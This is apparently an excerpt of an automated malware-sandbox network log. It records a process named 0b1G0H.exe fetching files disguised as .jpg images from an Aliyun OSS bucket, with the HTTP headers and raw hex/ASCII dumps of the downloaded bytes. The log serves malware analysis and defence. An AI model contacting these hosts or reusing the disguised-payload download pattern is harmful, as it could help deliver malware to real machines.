                                                                            2025-01-15 08:03:09 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                                                            Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                                                            2025-01-15 08:03:09 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                                                            Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                                            2025-01-15 08:03:09 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                                                            Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                                                            2025-01-15 08:03:09 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                                                            Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                                                            2025-01-15 08:03:09 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                                                            Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.449890118.178.60.94437752C:\Users\user\Documents\0b1G0H.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:03:22 UTC115OUTGET /FOM-52.jpg HTTP/1.1
                                                                            User-Agent: GetData
                                                                            Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                            Cache-Control: no-cache
                                                                            2025-01-15 08:03:23 UTC546INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:03:22 GMT
                                                                            Content-Type: image/jpeg
                                                                            Content-Length: 5062442
                                                                            Connection: close
                                                                            x-oss-request-id: 67876BCA2C1E9336373D47FC
                                                                            Accept-Ranges: bytes
                                                                            ETag: "70C21DA900796B279A09040B00953E40"
                                                                            Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 360383310743409046
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000105
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                                                            x-oss-server-time: 4
                                                                            2025-01-15 08:03:23 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                            Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                            2025-01-15 08:03:23 UTC4096INData Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f
                                                                            Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|o
                                                                            2025-01-15 08:03:23 UTC4096INData Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11
                                                                            Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                            2025-01-15 08:03:23 UTC4096INData Raw: f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5
                                                                            Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
                                                                            2025-01-15 08:03:23 UTC4096INData Raw: 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d f2
                                                                            Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,|Zk!4ROn2 HPijFS~DcC69Kv m
                                                                            2025-01-15 08:03:23 UTC4096INData Raw: f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c ab
                                                                            Data Ascii: NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
                                                                            2025-01-15 08:03:23 UTC4096INData Raw: fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71 25
                                                                            Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq%
                                                                            2025-01-15 08:03:23 UTC4096INData Raw: ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59 3a
                                                                            Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<|=UyO}YzX<~+#~j8cZ2[*.K0`++@)GZr*g"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY:
                                                                            2025-01-15 08:03:23 UTC4096INData Raw: cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3 4d
                                                                            Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:M
                                                                            2025-01-15 08:03:23 UTC4096INData Raw: 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3 ed
                                                                            Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.449963118.178.60.94437752C:\Users\user\Documents\0b1G0H.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:03:37 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                                                            User-Agent: GetData
                                                                            Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                            Cache-Control: no-cache
                                                                            2025-01-15 08:03:37 UTC546INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:03:37 GMT
                                                                            Content-Type: image/jpeg
                                                                            Content-Length: 366410
                                                                            Connection: close
                                                                            x-oss-request-id: 67876BD95C00693038215A0C
                                                                            Accept-Ranges: bytes
                                                                            ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                                                            Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 5641369857548672686
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000105
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                                                            x-oss-server-time: 8
                                                                            2025-01-15 08:03:37 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                            Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                            2025-01-15 08:03:37 UTC4096INData Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60
                                                                            Data Ascii: ```````````````````````````````````````````````````````````````
                                                                            2025-01-15 08:03:37 UTC4096INData Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5
                                                                            Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
